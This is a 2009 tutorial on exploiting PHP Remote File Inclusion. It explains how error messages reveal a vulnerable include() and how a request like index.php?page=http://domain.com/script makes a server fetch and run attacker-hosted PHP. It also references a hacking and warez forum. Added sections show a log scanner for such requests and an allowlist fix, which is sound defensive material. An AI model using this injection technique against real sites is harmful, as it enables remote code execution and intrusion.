RFI Tutorial

In this article I will describe the following.
What is RFI?
What can it do?
What's happening?
How does one write a vulnerable script like this?
and probably some other shit.




This article is written with PHP example scripts and errors.

What is RFI?

Small Definition: RFI, (R)emote (F)ile (I)nclusion, is a small but deadly vulnerability found in a major part of the web today.
It allows one to (include) (remote) (files).


Well, let's start off by giving a small example.
You are browsing a site and notice in the URL that one of the GET arguments is index.php?page=index.
You click on the "news" link in the navigation and it changes to index.php?page=news.
So you do some playing around and change the name to index.php?page=abcd and you get an error.

[Now let's start describing this thing]

Error: Warning: include(abcd.txt) [function.include]: failed to open stream: No such file or directory in /web/public_html/script.php on line 192

Alright, at first glance a lot of newbies would just look over this and not notice they had found an RFI vulnerability.

This tiny error tells me a little bit of information.

The Path: /web/public_html/
It just let me know the full path to all their web files; nothing special for this article, but it can really help out if you plan on gaining more access.

The Function: [function.include]
It just told me that it is trying to "include(abcd.txt)"

Notice that in the small example we got this error by passing page=abcd. So in the background you can expect the PHP script to be doing something like the following.

include("{$_GET['page']}.txt");

With this type of script you are somewhat limited on Local File Inclusion, but for Remote File Inclusion this is wonderful.
????: CyberXtreme - Exclusive Hacking & Warez Community http://cyberxtreme.info/board//showthread.php?t=4041

By default a .txt document is served with a content type of text/plain; more on this in a second.

So now let's actually inject something. We are going to inject a small piece of code that just prints out Hello World 10 times on the vulnerable page.

The script:
<?php for ($i = 0; $i < 10; $i++) { echo "Hello World"; } ?>
This script enters a loop that increments the variable $i by one each iteration while printing out the words "Hello World". (The explanation is kept outside the PHP tags on purpose: a // comment placed after ?> would be printed as literal text.)

Storing:
Now we need to stick this small script in a .txt file, for the reason I described above: the web server will not parse a .txt file as PHP, so it serves the PHP code as plain text.
Now just upload this somewhere that you can access it from an IP or URL, such as http://domain.com...

Now we need to go back to the vulnerable script we found and change the value to the location of your text file.
In this case we change it to index.php?page=http://domain.com/script

The reason we left out the .txt is what we noticed in the error:
the script is appending the .txt extension to the page argument itself.

So when we send this, the vulnerable script should be doing something like this:
include("http://domain.com/script.txt"); // including your remote file that has the PHP script in it.

Even though this script is stored in a plain text document, it is being passed through the include() function in PHP.
This function is going to parse the PHP within this text file no matter what format the file was originally in.

So now looking at the page we should notice that it prints out "Hello World" 10 times. That means we successfully injected a PHP script and the server parsed it.
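From the defender's side, the request shape this tutorial produces (a GET parameter whose value is a whole URL) is easy to spot in web server access logs. The following PHP script is an added example and is not part of the original tutorial; the log lines, the client address and the function name are constructed for the demonstration.

```php
<?php
// Added example, not from the original tutorial: scan common-log-format
// access log lines for GET parameters whose value is a full URL, i.e. the
// request shape index.php?page=http://... described in the tutorial.
// The log lines below are constructed for this demonstration.

const ACCESS_LOG = <<<'LOG'
203.0.113.5 - - [19/Feb/2009:16:34:01 -0500] "GET /index.php?page=news HTTP/1.1" 200 5120
203.0.113.5 - - [19/Feb/2009:16:34:09 -0500] "GET /index.php?page=abcd HTTP/1.1" 200 310
203.0.113.5 - - [19/Feb/2009:16:34:40 -0500] "GET /index.php?page=http://domain.com/script HTTP/1.1" 200 220
203.0.113.5 - - [19/Feb/2009:16:35:02 -0500] "GET /index.php?page=http%3A%2F%2Fdomain.com%2Fscript HTTP/1.1" 200 220
LOG;

// Returns one [client, path, parameter, url] entry per suspicious request.
function find_remote_include_attempts(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // Pull the client address and the request target out of the log line.
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/', $line, $m)) {
            continue;   // not a request line we understand; skip it
        }
        $client = $m[1];
        $target = $m[2];

        // Split the target into path and query string by hand; a query may
        // itself contain "://", so plain string handling is the safest route.
        $qpos = strpos($target, '?');
        if ($qpos === false) {
            continue;   // no parameters at all
        }
        $path  = substr($target, 0, $qpos);
        $query = substr($target, $qpos + 1);

        // parse_str() percent-decodes, so the encoded variant on the last
        // log line is caught as well as the literal one.
        parse_str($query, $params);
        foreach ($params as $name => $value) {
            if (is_string($value) && preg_match('#^https?://#i', $value)) {
                $hits[] = [$client, $path, $name, $value];
            }
        }
    }
    return $hits;
}

foreach (find_remote_include_attempts(ACCESS_LOG) as [$client, $path, $name, $url]) {
    echo "possible RFI attempt from {$client}: {$path} parameter '{$name}' = {$url}\n";
}
```

Run with `php scan.php`. Of the four constructed lines only the two whose page parameter decodes to a URL are reported; the normal `page=news` request and the `page=abcd` probe are not, so this check on its own will not show the information-gathering step and should be paired with watching for the "failed to open stream" warnings in the PHP error log.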

Congratulations!

Why would someone be vulnerable to this?
There are a lot of people out there that program without any knowledge of security at all.
They write this small, easy script <?php include("{$_GET['page']}.txt"); ?> thinking that it's going to save them a lot of problems in the future.

Now they can simply create file.txt and link to index.php?page=file and it will include and parse that script no problem.
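The same convenience can be kept without handing control of the include path to the visitor. The following PHP file is an added example and is not code from the original tutorial: it places the vulnerable pattern above next to a hardened version that maps the page parameter onto a fixed table of files. The function names, PAGES_DIR and the allowlist entries are assumptions for this illustration.

```php
<?php
// Added example, not from the original tutorial. The vulnerable function is
// the tutorial's own pattern; the hardened one is an allowlist rewrite.
// Function names, PAGES_DIR and the allowlist entries are assumptions.

// VULNERABLE: whatever the visitor supplies in ?page= is joined into the
// include path, so a value such as http://domain.com/script makes PHP fetch
// and execute a remote file (when allow_url_include is On), and the error
// text discloses the server path, as the tutorial shows.
function include_page_vulnerable(string $page): void
{
    include("{$page}.txt");
}

// HARDENED: the request value is only ever used as a lookup key. The real
// file name comes from the table, so the include path can never be a URL
// or anything else the application did not list.
const PAGES_DIR = __DIR__ . '/pages';  // assumption: templates live here

function resolve_page(string $page): ?string
{
    $pages = [
        'index' => 'index.txt',
        'news'  => 'news.txt',
    ];
    if (!array_key_exists($page, $pages)) {
        return null;   // unknown key: refuse instead of guessing
    }
    return PAGES_DIR . '/' . $pages[$page];
}

function include_page_hardened(string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';   // no path or function name leaks here
        return;
    }
    include $path;
}

// Defense in depth: with allow_url_include=Off in php.ini (the default
// since PHP 5.2) include() refuses http:// URLs altogether, so the remote
// part of the attack fails even if an application slips.
function remote_include_disabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN) === false;
}

// Demonstration with the constructed inputs the tutorial tries.
foreach (['index', 'news', 'abcd', 'http://domain.com/script'] as $input) {
    $resolved = resolve_page($input) ?? 'REJECTED';
    echo "page={$input} -> {$resolved}\n";
}
echo 'allow_url_include off: ' . (remote_include_disabled() ? 'yes' : 'no') . "\n";
```

The other half of the tutorial's foothold is the warning that prints the full path; on a production server that belongs in the error log (display_errors=Off, log_errors=On in php.ini) rather than in the page, which removes the path disclosure without changing the application code.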


Latest page update: made by Canakar, Feb 19 2009, 4:34 PM EST
Keyword tags: General RFI Tutorial